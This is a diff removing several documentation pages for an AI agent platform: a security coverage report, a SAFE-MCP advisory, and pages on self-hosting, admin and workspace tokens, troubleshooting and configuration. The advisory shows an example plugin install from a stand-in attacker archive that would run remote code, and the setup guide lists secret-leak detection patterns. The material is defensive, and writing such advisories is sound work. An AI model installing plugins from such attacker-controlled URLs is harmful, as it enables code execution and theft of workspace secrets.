- **Langfuse trace visibility:** All agent outputs and tool call results are
captured in Langfuse traces. Operators can identify hallucinated outputs
by reviewing traces, especially when downstream tool calls fail or produce
implausible results.
- **A2A result attribution:** A2A delegation responses include the source
workspace identity and the full execution trace. Consumers of A2A results
can audit where the data came from.
- **Human review via canvas:** Results surfaced via `notify_user` or displayed
in the canvas are visible to humans who can flag hallucinated outputs.
- **Activity logs for audit:** All tool call results are logged. If a downstream
agent acts on hallucinated data, the chain of events is traceable.
**Residual risk:** The platform does not automatically detect or flag
hallucinations — it provides observability. It is the operator's responsibility
to configure confidence thresholds, set up automated result validation where
possible, and review traces for signs of cascade errors.
---
## A08 — Overreliance ⚠️ PARTIAL
**Risk:** Users or automated systems trust an agent's outputs without adequate
verification, leading to harmful decisions based on incorrect agent outputs.
**Molecule AI controls:**
- **Observable decision traces:** Langfuse traces show the full chain of
reasoning and tool calls. Downstream consumers can audit outputs before
acting on them.
- **Canvas notification clarity:** `notify_user` messages are human-readable
summaries — not raw JSON — which can include uncertainty indicators if the
agent is prompted to include them.
- **Tier-based capability limits:** Higher tiers require explicit admin approval
to activate, ensuring operators are aware when a workspace has elevated
capabilities.
**Gaps:**
- **No automated output verification:** The platform does not provide a
built-in mechanism for agents to self-verify outputs (e.g., cross-checking a
code generation against a linter before returning).
- **No confidence scoring surface:** The platform does not currently surface
LLM confidence or probability scores in a structured way. Agents that
include confidence in their outputs are relying on prompting alone.
- **No policy enforcement on agent outputs:** There is no platform-level
mechanism to reject agent outputs that violate defined policies before they
are acted upon.
**Recommendation:** Prompt agents to include uncertainty flags and self-check
steps. Configure downstream systems to require human review for high-stakes
agent outputs.
---
## A09 — Supply Chain Vulnerabilities ❌ NOT COVERED
**Risk:** Vulnerable or malicious dependencies in the agent toolchain — workspace
runtime packages, plugins, adapter libraries, or LLM provider SDKs.
**Molecule AI's position:** This risk is inherited from the broader software
supply chain and is not specifically addressed by the platform at this time.
**What operators must manage independently:**
- Workspace runtime dependencies (`molecule-ai-workspace-runtime` and its
transitive dependencies)
- Plugin dependencies (see
[SAFE-MCP Advisory: G-01](/docs/security/safe-mcp-advisory#g-01-unpinned-npm-mcp-packages--high))
- Workspace template adapter dependencies (Python packages installed by
adapter-specific Dockerfiles)
- LLM provider SDKs and their transitive dependencies
**Mitigation operators should apply:**
- Pin all Python and npm dependencies to exact versions in workspace templates
and plugins
- Use `npm ci` / `pip freeze` and commit lockfiles
- Subscribe to security advisories for all runtime dependencies
- Scan container images for known CVEs before deploying
---
## A10 — Improper Agency Grants ❌ NOT COVERED
**Risk:** An agent is granted more agency (capability to take actions, access
resources, make changes) than it needs — creating blast radius if the agent is
compromised or misbehaves.
**Molecule AI's position:** The platform provides the building blocks for
least-privilege agent design (tier-based caps, per-workspace secrets, scoped
tokens, memory isolation) but does not enforce least-privilege agency at the
agent action level.
**Gaps:**
- **No action-level RBAC:** The MCP server exposes all 87 tools to all
authenticated workspaces. There is no mechanism to restrict a specific
agent's access to a subset of tools (e.g., blocking `delete_workspace` or
`send_channel_message` for a read-only agent).
- **No approval workflow for high-impact actions:** The platform does not
support requiring human approval before an agent executes a high-impact tool
(e.g., deleting a resource, sending an external API request, modifying a
secret).
- **Admin tokens are all-or-nothing:** The `ADMIN_TOKEN` gates all `/admin/*`
endpoints. There is no concept of scoped admin tokens with per-endpoint
permissions.
- **Plugins have full workspace access:** Once a plugin is installed, it
executes within the workspace context with access to all workspace tools and
secrets.
**Recommendation:** Apply defense in depth — restrict MCP tool exposure at the
agent configuration level, use workspace tiers to limit container capabilities,
and review plugin manifests before installation (see
[SAFE-MCP Advisory: G-02](/docs/security/safe-mcp-advisory#g-02-no-manifest-signing--high)).
---
## Coverage methodology
This report was produced by Research Lead (2026-04-18) reviewing platform source
code, configuration defaults, and the deployed security posture against each
OWASP Agentic AI Top 10 category.
**"COVERED"** means the platform provides specific, built-in controls that
mitigate the risk, even if residual risk remains at the agent behavior level.
**"PARTIAL"** means the platform provides some controls but significant gaps
remain that operators must address through configuration or complementary
tooling.
**"NOT COVERED"** means the risk is not addressed by the platform as shipped.
Operators must manage it independently.
---
## Reporting gaps
If you believe a coverage assessment is incorrect or want to propose a new
control for a gap, open an issue in `Molecule-AI/molecule-core` tagged
`security` or reach out through your support channel.

View File

@ -1,262 +0,0 @@
---
title: SAFE-MCP Security Advisory (2026-04-17)
description: High-severity findings from the SAFE-MCP audit and recommended mitigations for self-hosted deployments.
---
## Advisory overview
This advisory documents three HIGH-severity findings from the SAFE-MCP
security audit performed on the Molecule AI platform in April 2026. All three
affect **self-hosted** deployments. If you are using the SaaS offering at
`moleculesai.app`, mitigations are applied server-side — no action needed.
**Published:** April 17, 2026
**Severity:** HIGH (G-01, G-02, G-03)
**Affected versions:** All self-hosted deployments prior to the fixes shipped
in PRs #808 and associated plugin updates.
**Fixed in:** `molecule-core` PRs #808 (platform), #809 (plugin scaffold).
---
## G-01: Unpinned npm MCP packages — HIGH
### Description
The workspace plugin scaffold (`plugins/molecule-ai-plugin-*/package.json`) uses
unpinned version ranges for npm dependencies:
```json
"dependencies": {
"@anthropic-ai/sdk": "^0.32.0"
}
```
The caret (`^`) range means `npm install` can resolve to any compatible version,
including versions with known vulnerabilities or a malicious `next` release
published after the audit date.
### Risk
- Supply chain compromise if a package maintainer publishes a malicious version
- Silent dependency drift as `npm install` pulls newer patch/minor versions
- Potential conflicts with workspace-runtime's own dependency tree
### Recommended mitigation
Pin all npm dependencies to exact versions before deploying:
```bash
# In each plugin directory
npm install --save-exact @anthropic-ai/sdk@0.32.1
npm install --save-exact <other-deps>
```
Add an `.npmrc` to enforce pinned installs:
```ini
save-exact=true
```
Commit `package-lock.json` and verify CI installs from the lockfile:
```bash
npm ci # instead of npm install
```
For the platform build, ensure `npm ci` is used in CI rather than `npm install`
to respect the lockfile.
---
## G-02: No manifest signing — HIGH
### Description
Plugin manifests (`manifest.json`) are served by the platform and executed by
workspace containers without cryptographic verification. There is no mechanism
to confirm that the manifest has not been tampered with after it was published
by the plugin author.
### Risk
- An attacker with write access to the plugin source repository (or the CDN
serving it) could modify `manifest.json` to:
- Inject additional tools that exfiltrate secrets from the workspace
- Redirect API calls to a malicious endpoint
- Add an attacker-controlled `entrypoint` path
### Recommended mitigation
**短期 (short-term):** Inspect `manifest.json` files for all plugins before
enabling them. Verify the `author`, `version`, and `entrypoint` are from a
trusted source. Do not enable plugins from untrusted or unknown authors.
**长期 (long-term):** The platform will add manifest signing aligned with the
OWASP MCPS (MCP Secure) cryptographic security layer. Plugin authors digitally
sign their tool definitions (name, description, inputSchema) with an ECDSA P-256
key pair. The platform verifies signatures against the author's published public
key, computes and stores schema hashes for pinning, and rejects connections where
the schema hash has changed since the last verified session — providing "rug pull
protection." This follows the MCPS L3 trust level: signed tool definitions
required. Track progress in `molecule-core` issue tracker.
Until signing is available, treat plugin manifests as untrusted input.
---
## G-03: Floating plugin references — HIGH
### Description
Workspaces can install plugins by referencing any publicly accessible URL:
```bash
POST /workspaces/:id/plugins
{
"source": "https://github.com/attacker/malicious-plugin/archive/refs/heads/main.tar.gz"
}
```
There is no allowlist, no integrity check, and no review gate on the plugin
URL before the workspace downloads and executes code from it.
### Risk
- Confidential workspace data (secrets, memory, files) is sent to attacker-controlled servers
- Arbitrary code execution within the workspace container
- Lateral movement from the workspace container to internal services
### Recommended mitigations
**1. Restrict plugin installation in your deployment config:**
Add a platform-level environment variable to allow only approved plugin sources.
Until this variable exists, enforce it at the network layer (see below).
**2. Network-level egress filtering:**
Block outbound traffic from workspace containers to all IPs except the
platform API and required external services (LLM providers, vector DBs, etc.).
Workspace containers should not be able to reach arbitrary GitHub archives or
external plugin URLs directly.
Example Fly.io `fly.toml` rule:
```toml
[[vm]]
auto_destroy = false
# App-level egress rules (Fly Private Network)
```
Or use a Kubernetes `NetworkPolicy`:
```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: workspace-egress-lockdown
spec:
podSelector:
matchLabels:
component: workspace
policyTypes:
- Egress
egress:
- to:
- podSelector: {}
ports:
- port: 8080 # platform API
- to:
- namespaceSelector: {}
podSelector:
matchLabels:
app: redis
ports:
- port: 6379
# Block all other egress
```
**3. Plugin allowlist (platform-level):**
Set `PLUGIN_ALLOW_UNPINNED=false` in your environment to reject any plugin
install requests that reference unpinned or unverified sources.
---
## Remediation checklist for self-hosted operators
- [ ] Audit all plugin `package.json` files — pin all dependencies to exact versions
*(MCP04: "avoid 'latest' or floating version references")*
- [ ] Verify CI/CD uses `npm ci` not `npm install`
*(MCP04: "no dependency integrity verification")*
- [ ] Commit and push `package-lock.json` for all plugins
- [ ] Add `.npmrc save-exact=true` to all plugin directories
- [ ] Inspect `manifest.json` for any enabled plugin before use
*(MCP04: "MCP connectors or plugins are installed without signing or provenance checks")*
- [ ] Block workspace egress to non-approved hosts at the network level
*(MCP09: "no asset inventory or endpoint discovery process")*
- [ ] Set `PLUGIN_ALLOW_UNPINNED=false` (when available)
*(MCP09: "teams can deploy MCP servers without central registration or security review")*
- [ ] Watch `molecule-core` for the manifest-signing feature
*(MCPS L3: "tool definition signatures required")*
---
## Normative references
The mitigations in this advisory align with the following OWASP publications:
**MCP04:2025 — Software Supply Chain Attacks & Dependency Tampering**
*OWASP MCP Top 10, 2025 edition*
[*OWASP MCP Top 10, 2025 edition*](https://github.com/OWASP/www-project-mcp-top-10)
Relevant controls that informed G-01 and G-02 mitigations:
- *Signed Components & Provenance Verification:* "Require cryptographic signing for
SDKs, plugins, tool manifests, container images, and validate signatures during
installation and startup."
- *Version Pinning & Approved Registries:* "Pin component versions and avoid
'latest' references. Use internal package mirrors or registries and block direct
downloads from public internet sources."
- *Build SBOM/CBOM Visibility:* "Generate software bill of materials (SBOM) and
cryptographic bill of materials (CBOM) snapshots for each MCP server and plugin
package. Store these alongside deployments for auditing and incident response."
- *Dependency Scanning:* "Apply software composition analysis (SCA) and code
scanning tools to detect known CVEs, malicious indicators, and poisoned transitive
dependencies."
**MCP09:2025 — Shadow MCP Servers**
*OWASP MCP Top 10, 2025 edition*
[*OWASP MCP Top 10, 2025 edition*](https://github.com/OWASP/www-project-mcp-top-10)
Relevant controls that informed the G-03 plugin allowlist mitigation:
- *Central MCP Governance & Registry:* "Create a centralized registry where every
instance must be registered before deployment; tie registration to CI/CD pipelines."
- *Discovery & Continuous Scanning:* "Use network discovery tools to detect open
MCP ports and endpoints; automate weekly shadow MCP detection scans."
- *Baseline Configuration Templates:* "Enforce authentication (mTLS, OAuth), disable
unauthenticated tool calls, include preconfigured logging."
**MCPS — Cryptographic Security Layer for MCP**
*OWASP MCP Top 10 Recommended Controls*
[*OWASP MCP Top 10 Recommended Controls*](https://github.com/OWASP/www-project-mcp-top-10/tree/master/2025/recommended-controls)
The MCPS specification defines the Tool Definition Signing approach referenced in
the G-02 long-term mitigation:
- Tool authors sign tool definitions (name, description, inputSchema) with an
ECDSA P-256 private key; clients verify against the author's published public key.
- Schema hashes are computed and stored on first verified connection, then compared
on subsequent connections to detect unauthorized modifications — "rug pull protection."
- MCPS defines four trust levels (L0L4); the G-02 long-term fix targets L3:
"L3: L2 plus tool definition signatures required."
---
## Reporting security issues
If you discover a new security issue in Molecule AI, please report it via
GitHub Security Advisories on `Molecule-AI/molecule-core` or contact the
security team through your support channel.

View File

@ -1,208 +0,0 @@
---
title: Self-Hosting
description: Run the full Molecule AI stack on your own infrastructure.
---
## Prerequisites
| Requirement | Minimum Version |
|-------------|----------------|
| Docker Desktop | Latest stable |
| Go | 1.25+ |
| Node.js | 20+ |
| Git | 2.x |
## Quick Start
The fastest way to get Molecule AI running locally:
```bash
git clone https://github.com/Molecule-AI/molecule-core.git
cd molecule-core
./scripts/dev-start.sh
# Canvas: http://localhost:3000
# Platform: http://localhost:8080
```
This script starts all infrastructure services, builds the platform, and launches the canvas dev server.
## Infrastructure Setup
Molecule AI depends on four infrastructure services, all managed via `docker-compose.infra.yml` and attached to the shared `molecule-monorepo-net` Docker network:
| Service | Port | Purpose |
|---------|------|---------|
| Postgres | 5432 | Primary datastore (also backs Langfuse and Temporal) |
| Redis | 6379 | Pub/sub, heartbeat TTLs |
| Langfuse | 3001 | LLM trace viewer (backed by ClickHouse) |
| Temporal | 7233 (gRPC), 8233 (Web UI) | Durable workflow engine |
Start infrastructure only:
```bash
./infra/scripts/setup.sh
```
Tear everything down (removes volumes):
```bash
./infra/scripts/nuke.sh
```
## Manual Setup
If you prefer to start each component individually:
### Platform (Go)
```bash
cd platform
go build ./cmd/server
go run ./cmd/server
# Requires Postgres + Redis running
```
The platform must be run from the `platform/` directory, not the repo root.
### Canvas (Next.js)
```bash
cd canvas
npm install
npm run dev
# Dev server on http://localhost:3000
```
### Docker Compose
For infrastructure only:
```bash
docker compose -f docker-compose.infra.yml up -d
```
For the full stack (infrastructure + platform + canvas):
```bash
docker compose up
```
## Environment Variables
### Platform
| Variable | Default | Description |
|----------|---------|-------------|
| `DATABASE_URL` | -- | Postgres connection string (required) |
| `REDIS_URL` | -- | Redis connection string (required) |
| `PORT` | `8080` | Platform HTTP port |
| `PLATFORM_URL` | `http://host.docker.internal:PORT` | URL passed to agent containers to reach the platform |
| `CORS_ORIGINS` | `http://localhost:3000,http://localhost:3001` | Comma-separated allowed origins |
| `SECRETS_ENCRYPTION_KEY` | -- | AES-256 key (32 bytes) for encrypting workspace secrets |
| `WORKSPACE_DIR` | -- | Global fallback host path for `/workspace` bind-mount |
| `MOLECULE_ENV` | -- | Set to `production` to hide E2E helper endpoints |
| `ACTIVITY_RETENTION_DAYS` | `7` | How long activity logs are retained |
| `ACTIVITY_CLEANUP_INTERVAL_HOURS` | `6` | How often the cleanup job runs |
| `RATE_LIMIT` | `600` | Requests per minute per client |
### Tier Resource Limits
Override per-tier memory and CPU caps for workspace containers. CPU\_SHARES follows Docker's convention where 1024 equals 1 CPU.
| Variable | Default | Description |
|----------|---------|-------------|
| `TIER2_MEMORY_MB` | `512` | Standard tier memory limit |
| `TIER2_CPU_SHARES` | `1024` | Standard tier CPU shares |
| `TIER3_MEMORY_MB` | `2048` | Privileged tier memory limit |
| `TIER3_CPU_SHARES` | `2048` | Privileged tier CPU shares |
| `TIER4_MEMORY_MB` | `4096` | Full-host tier memory limit |
| `TIER4_CPU_SHARES` | `4096` | Full-host tier CPU shares |
### Plugin Install Safeguards
| Variable | Default | Description |
|----------|---------|-------------|
| `PLUGIN_INSTALL_BODY_MAX_BYTES` | `65536` | Max request body size (64 KiB) |
| `PLUGIN_INSTALL_FETCH_TIMEOUT` | `5m` | Whole fetch and copy deadline |
| `PLUGIN_INSTALL_MAX_DIR_BYTES` | `104857600` | Max staged-tree size (100 MiB) |
### Canvas
| Variable | Default | Description |
|----------|---------|-------------|
| `NEXT_PUBLIC_PLATFORM_URL` | `http://localhost:8080` | Platform API URL |
| `NEXT_PUBLIC_WS_URL` | `ws://localhost:8080/ws` | WebSocket endpoint |
### Tenant Mode
| Variable | Default | Description |
|----------|---------|-------------|
| `CANVAS_PROXY_URL` | -- | When set, the Go server proxies canvas requests to this URL |
| `MOLECULE_ORG_ID` | -- | UUID for multi-tenant isolation; leave unset for self-hosted |
## Production Deployment
For production, use `platform/Dockerfile.tenant` which builds a combined Go + Canvas image:
```bash
docker build -f platform/Dockerfile.tenant -t molecule-platform .
```
This image serves both the API and the canvas frontend from a single container.
## Security Configuration
### Secrets Encryption
Set `SECRETS_ENCRYPTION_KEY` to a 32-byte AES-256 key to encrypt workspace secrets at rest. Without this variable, secrets are stored in plaintext.
```bash
# Generate a key
openssl rand -hex 32
```
**Warning:** `SECRETS_ENCRYPTION_KEY` cannot be rotated without a data migration. Choose carefully before deploying to production.
### Rate Limiting
The `RATE_LIMIT` variable (default 600 requests/min) applies per client. Adjust based on your expected traffic.
### CORS
Set `CORS_ORIGINS` to a comma-separated list of allowed origins. In production, restrict this to your actual domain.
## Admin Authentication
All `/admin/*` endpoints require `ADMIN_TOKEN`. See
[ADMIN_TOKEN — Production Requirement](/docs/self-hosting/admin-token) for
setup, generation, and fail-open risk details.
**Action required by April 22, 2026:** Set `ADMIN_TOKEN` in all production
deployments before this date.
## Pre-commit Hook
Install the project's pre-commit hooks to enforce code quality:
```bash
git config core.hooksPath .githooks
```
The hook enforces:
- `'use client'` directive on hook-using `.tsx` files
- Dark theme only (no `white` or `light` CSS classes)
- No SQL injection patterns (`fmt.Sprintf` with SQL)
- No leaked secrets (`sk-ant-`, `ghp_`, `AKIA`)
Commits are rejected until all violations are fixed.
## Building Workspace Images
Build the base workspace image for local development:
```bash
bash workspace-template/build-all.sh
```
Adapter-specific images are built from standalone template repos. Each repo's `Dockerfile` installs `molecule-ai-workspace-runtime` from PyPI plus adapter-specific dependencies.

View File

@ -1,104 +0,0 @@
---
title: ADMIN_TOKEN — Production Requirement
description: Mandatory ADMIN_TOKEN configuration for self-hosted Molecule AI deployments.
---
## Overview
`ADMIN_TOKEN` is a **required** secret for all production Molecule AI deployments.
It gates access to administrative endpoints and must be set before going live.
**Deadline to migrate: April 22, 2026.** Deployments without `ADMIN_TOKEN` set
will begin rejecting `/admin/*` requests after this date.
## What ADMIN_TOKEN is
`ADMIN_TOKEN` is a bearer token that authenticates callers to the platform's
administrative endpoints (`/admin/*`). It is checked by the `AdminAuth`
middleware on every admin route.
## Generating a token
Generate a cryptographically random token:
```bash
openssl rand -base64 32
```
Store the output — it is shown only once and cannot be recovered from the
platform.
## Setting ADMIN_TOKEN in production
### Fly.io (recommended for self-hosted)
```bash
fly secrets set ADMIN_TOKEN="your-generated-token"
fly deploy
```
### Docker / Docker Compose
```yaml
services:
platform:
environment:
ADMIN_TOKEN: "your-generated-token"
```
### Bare-metal / systemd
```bash
export ADMIN_TOKEN="your-generated-token"
./platform-server # or however you start the binary
```
## What ADMIN_TOKEN gates
All `/admin/*` endpoints require `Authorization: Bearer <ADMIN_TOKEN>`:
| Endpoint | Purpose |
|---|---|
| `GET /admin/workspaces` | List all workspaces |
| `POST /admin/workspaces/:id/pause` | Pause a workspace |
| `POST /admin/workspaces/:id/resume` | Resume a workspace |
| `POST /admin/workspaces/:id/terminate` | Force-terminate a container |
| `GET /admin/metrics` | Platform-level metrics |
| `POST /admin/tier-promote` | Promote a workspace to a higher tier |
## What happens if ADMIN_TOKEN is missing
In deployments where `ADMIN_TOKEN` is **unset** (empty string or not present in
the environment), the `AdminAuth` middleware currently **fail-opens** — it allows
all requests through without credential validation.
This fail-open behavior exists for backward compatibility during the transition
period but **will be removed**. After April 22, 2026, requests to `/admin/*`
endpoints without a valid `ADMIN_TOKEN` will return `401 Unauthorized`.
## Verifying your setup
Check that `ADMIN_TOKEN` is present and working:
```bash
curl -s -H "Authorization: Bearer $ADMIN_TOKEN" \
http://localhost:8080/admin/workspaces | jq '.count'
```
If the response is `401`, the token is missing or incorrect. If you get a JSON
payload with a `count` field, the token is working.
## Rotating ADMIN_TOKEN
To rotate without downtime:
1. **Deploy** the new token: `fly secrets set ADMIN_TOKEN="new-token" && fly deploy`
2. **Verify** the new token works (see above)
3. **Remove** the old token: `fly secrets unset OLD_TOKEN_NAME` (Fly does not
persist old secret values after unset)
## Related
- [Self-Hosting overview](/docs/self-hosting) — full deployment guide
- [Security Configuration](/docs/self-hosting#security-configuration) — other
production security variables

View File

@ -1,115 +0,0 @@
---
title: Token Management
description: Create, list, and revoke workspace bearer tokens for API authentication.
---
Workspace bearer tokens authenticate agents and API clients against the
Molecule AI platform. Each token is scoped to a single workspace — a token
from workspace A cannot access workspace B.
## Endpoints
All endpoints are behind `WorkspaceAuth` middleware — you need an existing
valid token to manage tokens. The first token is issued during workspace
registration (`POST /registry/register`).
### List tokens
```bash
GET /workspaces/:id/tokens
Authorization: Bearer <token>
```
Returns non-revoked tokens. Only metadata is returned — never the plaintext or hash.
```json
{
"tokens": [
{
"id": "uuid-of-token-row",
"prefix": "abc12345",
"created_at": "2026-04-16T12:00:00Z",
"last_used_at": "2026-04-16T15:30:00Z"
}
],
"count": 1
}
```
### Create token
```bash
POST /workspaces/:id/tokens
Authorization: Bearer <token>
```
Mints a new token. The plaintext is returned **exactly once** — save it immediately.
```json
{
"auth_token": "dGhpcyBpcyBhIHRlc3QgdG9rZW4...",
"workspace_id": "ws-uuid",
"message": "Save this token now — it cannot be retrieved again."
}
```
### Revoke token
```bash
DELETE /workspaces/:id/tokens/:tokenId
Authorization: Bearer <token>
```
Revokes a specific token by its database ID (from the List response).
```json
{
"status": "revoked"
}
```
Returns 404 if the token doesn't exist, belongs to a different workspace, or
is already revoked.
## Token rotation
To rotate credentials without downtime:
1. **Create** a new token: `POST /workspaces/:id/tokens`
2. **Update** your agent to use the new token
3. **Verify** the new token works (check `last_used_at` in List)
4. **Revoke** the old token: `DELETE /workspaces/:id/tokens/:oldTokenId`
## Bootstrap — getting your first token
The first token is issued during workspace registration:
```bash
# 1. Create workspace
curl -X POST http://localhost:8080/workspaces \
-H "Content-Type: application/json" \
-d '{"name": "My Agent", "tier": 2}'
# 2. Register (returns auth_token)
curl -X POST http://localhost:8080/registry/register \
-H "Content-Type: application/json" \
-d '{"workspace_id": "<id>", "url": "http://...", "agent_card": {...}}'
```
For local development, the test-token endpoint is also available (disabled in production):
```bash
curl http://localhost:8080/admin/workspaces/<id>/test-token
```
## Security properties
| Property | Detail |
|---|---|
| Entropy | 256-bit (32 random bytes, base64url-encoded) |
| Storage | sha256 hash only — plaintext never persisted |
| Scope | Per-workspace — token A cannot auth workspace B |
| Display | Shown once at creation, not recoverable |
| Prefix | First 8 characters stored for log correlation |
| Expiration | None — tokens are permanent until revoked |
| Auto-revoke | All tokens revoked when workspace is deleted |

View File

@ -1,164 +0,0 @@
---
title: Troubleshooting
description: Common issues and how to fix them.
---
## Workspace Stuck in "Provisioning"
A workspace that stays in `provisioning` for more than 30 seconds usually indicates a container startup failure.
**Steps to diagnose:**
1. Check Docker logs for the workspace container:
```bash
docker logs <container-id>
```
2. Verify the workspace image exists locally:
```bash
docker images | grep workspace-template
```
3. Check tier resource limits -- the container may be OOM-killed on start. Review `TIER2_MEMORY_MB` / `TIER3_MEMORY_MB` / `TIER4_MEMORY_MB` values.
4. Ensure the platform can reach the Docker daemon (Docker Desktop must be running).
## 401 Unauthorized on API Calls
Bearer tokens can expire or be revoked. Workspace tokens are also auto-revoked when a workspace is deleted.
**Resolution:**
- For workspace-scoped endpoints, mint a new token:
```bash
# Development/staging only (hidden when MOLECULE_ENV=production)
curl http://localhost:8080/admin/workspaces/:id/test-token
```
- For admin endpoints, verify your token is still valid against a known-good endpoint like `GET /health`.
- Legacy workspaces (created before Phase 30.1) are grandfathered and do not require tokens on heartbeat/update-card routes.
## WebSocket Shows "Reconnecting"
The canvas WebSocket connection (`/ws`) drops and retries.
**Common causes:**
- `CORS_ORIGINS` does not include your domain -- the WebSocket upgrade is rejected. Add your origin to the comma-separated list.
- A reverse proxy or firewall is terminating the long-lived connection. Ensure WebSocket upgrade headers are forwarded.
- The platform process crashed or restarted. Check platform logs.
**Verify connectivity:**
```bash
# Quick check that the WS endpoint is reachable
curl -i -N \
-H "Connection: Upgrade" \
-H "Upgrade: websocket" \
-H "Sec-WebSocket-Version: 13" \
-H "Sec-WebSocket-Key: dGVzdA==" \
http://localhost:8080/ws
```
## Agent Not Responding to A2A
When one agent cannot reach another via the A2A proxy (`POST /workspaces/:id/a2a`), check communication rules.
**The `CanCommunicate` access check allows:**
- Same workspace (self-call)
- Siblings (same parent)
- Root-level siblings (both have no parent)
- Parent to child or child to parent
**Everything else is denied.** If two agents need to communicate, they must be in the same subtree.
**Also verify:**
- The target workspace is `online` (not `paused`, `offline`, or `provisioning`)
- The target's heartbeat is fresh (Redis TTL has not expired)
- The caller includes `X-Workspace-ID` and `Authorization: Bearer <token>` headers
## Schedule Not Firing
Cron schedules are managed by the platform scheduler subsystem.
**Checklist:**
- Verify the cron expression is valid (standard 5-field cron syntax)
- Confirm the workspace is `online` -- paused workspaces skip all schedules
- Check if the schedule was `skipped` due to concurrency: the scheduler skips when `active_tasks > 0`. Review schedule history:
```
GET /workspaces/:id/schedules/:scheduleId/history
```
- Inspect `GET /admin/liveness` to ensure the scheduler subsystem is alive (age should be under 60 seconds)
## Channel Test Fails
Social channel integrations (Telegram, Slack, etc.) can fail for several reasons.
**Diagnose:**
- Verify the bot token is correct and has not been revoked by the platform provider
- Check the allowlist config in the channel's JSONB settings -- messages from non-allowlisted chats are silently dropped
- Ensure the webhook URL is registered with the external platform:
```
POST /webhooks/:type
```
This is the endpoint the external platform (Telegram, Slack) should send events to.
- Test the connection explicitly:
```
POST /workspaces/:id/channels/:channelId/test
```
## Migration Crash on Boot
The platform runs all `*.up.sql` migrations on every startup (there is no `schema_migrations` tracking table yet).
**Common issues:**
- Migrations must be idempotent (`CREATE TABLE IF NOT EXISTS`, `ALTER TABLE ... IF NOT EXISTS`). If a migration lacks this guard, the second boot fails.
- Before PR #212, the migration runner did not filter `.down.sql` files, causing tables to be dropped on every boot. Ensure you are running a platform version that includes this fix.
- If you see errors about duplicate columns or tables, the migration is not idempotent. Patch the `.up.sql` file to add `IF NOT EXISTS` guards.
## Canvas Blank or 502 on Tenant Deploy
In tenant mode (`platform/Dockerfile.tenant`), the Go server proxies canvas requests.
**Verify:**
- `CANVAS_PROXY_URL` is set and points to the running Next.js process inside the container
- Both the Go server and the Node.js process are running (check container logs for both)
- The Next.js build completed successfully during `docker build`
## Plugin Install Timeout
Large plugins or slow network connections can exceed the default fetch deadline.
**Adjust limits:**
| Variable | Default | Description |
|----------|---------|-------------|
| `PLUGIN_INSTALL_FETCH_TIMEOUT` | `5m` | Increase for large or remote plugins |
| `PLUGIN_INSTALL_MAX_DIR_BYTES` | `104857600` (100 MiB) | Increase if the plugin tree exceeds 100 MiB |
| `PLUGIN_INSTALL_BODY_MAX_BYTES` | `65536` (64 KiB) | Increase if the install request body is large |
## Memory or Disk Usage Growing
Activity logs and structure events accumulate over time.
**Tune retention:**
- `ACTIVITY_RETENTION_DAYS` (default `7`) -- reduce to 3 or even 1 for high-traffic deployments
- `ACTIVITY_CLEANUP_INTERVAL_HOURS` (default `6`) -- reduce to run cleanup more frequently
- Monitor the `activity_logs` and `structure_events` tables directly if disk usage is a concern:
```sql
SELECT pg_size_pretty(pg_total_relation_size('activity_logs'));
SELECT pg_size_pretty(pg_total_relation_size('structure_events'));
```
## Container Health Detection
If workspaces go offline unexpectedly (e.g., Docker Desktop crash), three layers detect the failure:
1. **Passive (Redis TTL):** 60-second heartbeat key expires, liveness monitor triggers auto-restart
2. **Proactive (Health Sweep):** Docker API polled every 15 seconds, catches dead containers faster than TTL expiry
3. **Reactive (A2A Proxy):** On connection error to a workspace, checks `provisioner.IsRunning()` and triggers immediate offline + restart
If none of these are catching a dead container, check `GET /admin/liveness` to verify the health sweep and liveness monitor subsystems are running.

View File

@ -1,166 +0,0 @@
---
title: Workspace Configuration
description: Configure workspaces via config.yaml — runtime, model, tier, and Claude-specific settings including effort levels and task budget for Claude Opus 4.7.
---
import { Callout } from 'fumadocs-ui/components/callout';
# Workspace Configuration
Every Molecule AI workspace is backed by a `config.yaml` file. The **Config tab** in the canvas lets you edit this file through a structured form or in raw YAML mode. Changes take effect on the next workspace restart.
---
## Opening the Config tab
1. Click any workspace node on the canvas to open its sidebar
2. Select the **Config** tab
3. Edit fields in the form view, or toggle **Raw YAML** in the top-right to edit `config.yaml` directly
4. Click **Save** to write the file, or **Save & Restart** to apply changes immediately
---
## Claude Settings
The **Claude Settings** section of the Config tab exposes two primitives from the Claude Opus 4.7 API: **effort level** and **task budget**. These control how much reasoning work Claude does per turn — trading cost and latency for output quality.
<Callout type="info">
**Availability:** Claude Settings are only shown for workspaces running `runtime: claude-code` or using a model whose name includes `claude` or `anthropic`. The section is hidden for other runtimes and models.
</Callout>
The section is collapsed by default. Click **Claude Settings** to expand it.
---
## Effort levels
The **Effort** dropdown sets `output_config.effort` on the Claude Messages API call for every turn in this workspace.
| Value | Label | What it does | When to use |
|---|---|---|---|
| *(unset)* | — model default — | No `effort` field sent; Claude uses its built-in default | Everyday tasks where you want Claude to decide |
| `low` | low | Minimal reasoning steps; fastest response, lowest cost | Quick lookups, simple rewrites, high-throughput pipelines where latency matters |
| `medium` | medium | Balanced reasoning; Claude's typical quality for most tasks | General coding, writing, Q&A — a good starting point |
| `high` | high | More deliberate reasoning; higher quality, higher cost | Code review, architecture decisions, nuanced analysis |
| `xhigh` | xhigh (extended thinking) | **Activates extended thinking.** Claude works through the problem step-by-step before producing a final answer | Complex multi-step problems, hard debugging, long-range planning |
| `max` | max — absolute ceiling | Maximum possible effort; extended thinking at full depth | Research-grade reasoning, competitive benchmarks, correctness-critical tasks where cost is not a constraint |
### Tradeoffs
Higher effort levels improve output quality at the cost of latency and token spend:
- **Cost** scales roughly with reasoning depth. `max` can produce significantly more tokens than `low` on the same prompt.
- **Latency** increases with effort because Claude takes more reasoning steps before responding.
- **Quality** gains are most pronounced on tasks that require multi-step planning or where incorrect reasoning compounds (code generation, analysis, math).
For most workspaces, leaving effort **unset** or at **medium** is the right default. Move to `high` or above for specialist worker agents that handle tasks where errors are expensive — a security auditor, an architect, a final reviewer.
<Callout type="warn">
`xhigh` and `max` activate **extended thinking**, which is only available on **Claude Opus 4.7** and later. Using these levels with earlier models or other providers will return an API error.
</Callout>
---
## Task budget
The **Task Budget** field sets a token ceiling on how much thinking work Claude is allowed to do per turn. It maps to `output_config.task_budget.total` in the Messages API.
| Field | Type | Default | Minimum |
|---|---|---|---|
| `task_budget` | integer (tokens) | 0 (unset) | 20,000 when set |
**0 means unset** — no `task_budget` field is sent and Claude uses its own internal limit.
